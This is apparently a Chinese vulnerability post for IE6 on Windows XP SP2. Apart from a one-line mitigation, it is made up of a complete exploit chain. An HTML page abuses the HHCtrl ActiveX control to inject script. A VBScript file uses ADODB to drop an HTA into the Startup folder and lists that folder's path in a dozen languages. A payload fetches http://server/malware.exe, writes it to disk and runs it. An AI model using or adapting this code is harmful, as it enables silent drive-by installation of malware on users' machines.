影响:MS XP SP2 IE6
解决方法:将IE6的安全等级提升到最高。
测试:
// sp2rc.htm //
1<object classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194" height="7%" id="localpage" style="position:absolute;top:140;left:72;z-index:100;" type="application/x-oleobject" width="7%">
2<param name="Command" value="Related Topics, MENU"/>
3<param name="Button" value="Text:Just a button"/>
4<param name="Window" value="$global_blank"/>
5<param name="Item1" value="command;file://C:\WINDOWS\
6PCHealth\HelpCtr\System\blurbs\tools.htm"/>
7</object>
1<object classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194" height="7%" id="inject" style="position:absolute;top:140;left:72;z-index:100;" type="application/x-oleobject" width="7%">
2<param name="Command" value="Related Topics, MENU"/>
3<param name="Button" value="Text:Just a button"/>
4<param name="Window" value="$global_blank"/>
5<param name="Item1" value='command;javascript:
6execScript("document.write(\"<script language=\\\\\"vbscript\\\\\"
7src=\\\\\"http://site/writehta.txt\\\\\"\"+String.fromCharCode(62)+\"
8</scr\"+\"ipt\"+String.fromCharCode(62))")'/>
9</object>
1<script>
2localpage.HHClick();
3setTimeout("inject.HHClick()",100);
4</script>
// writehta.txt //
Dim Conn, rs
Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
"Dbq=http://server;" & _
"Extensions=asc,csv,tab,txt;" & _
"Persist Security Info=False"
Dim sql
sql = "SELECT * from foobar.txt"
set rs = conn.execute(sql)
set rs =CreateObject("ADODB.recordset")
rs.Open "SELECT * from foobar.txt", conn
rs.Save
"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta",
adPersistXML
// Spanish \Documents and Settings\All Users\Menu Inicio\Programas\Inicio\
// French \Documents and Settings\All Users\Menu D閙arrer\Programmes\D閙arrage
// Danish \Documents and Settings\All Users\Menuen Start\Programmer\Start\
// Dutch \Documents and Settings\All Users\Menu Start\Programma's\Opstarten\
// Polish \Documents and Settings\All Users\Menu Start\Programy\Autostart\
// Italian \Documents and Settings\All Users\Menu Avvio\Programmi\Esecuzione automatica\
// Finn \Documents and Settings\All Users\Kaynnista-valikko\Ohjelmat\Kaynnistys\
// Turkish \Documents and Settings\All Users\Start Menu\Programlar\BASLANGIC\ Turkish
// Norwegian \Documents and Settings\All Users\Start-meny\Programmer\Oppstart\
// Swedish \Documents and Settings\All Users\Start-menyn\Program\Autostart\
// Portuguese \Documents and Settings\All Users\Menu Iniciar\Programas\Iniciar\
// German \Dokumente und Einstellungen\All Users\Startmenu\Programme\Autostart\
rs.close
conn.close
window.close
// f00bar.txt //
"meaning less shit i had to put here"
"
1<script language="vbscript"> crap = """
2""": on error resume next: crap = """
3""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""
4""" : o.open ""GET"",""http://server/malware.exe"",False : crap="""
5""" : o.send : crap="""
6""" : set s = createobject(""adodb.stream"") : crap="""
7""" : s.type=1 : crap="""
8""" : s.open : crap="""
9""" : s.write o.responseBody : crap="""
10""" : s.savetofile ""C:\malware.exe"",2 : crap="""
11""" : Set ws = CreateObject(""WScript.Shell"") : crap="""
12""" : ws.Run ""C:\malware.exe"", 3, FALSE : crap="""
13"""</script>
crap="""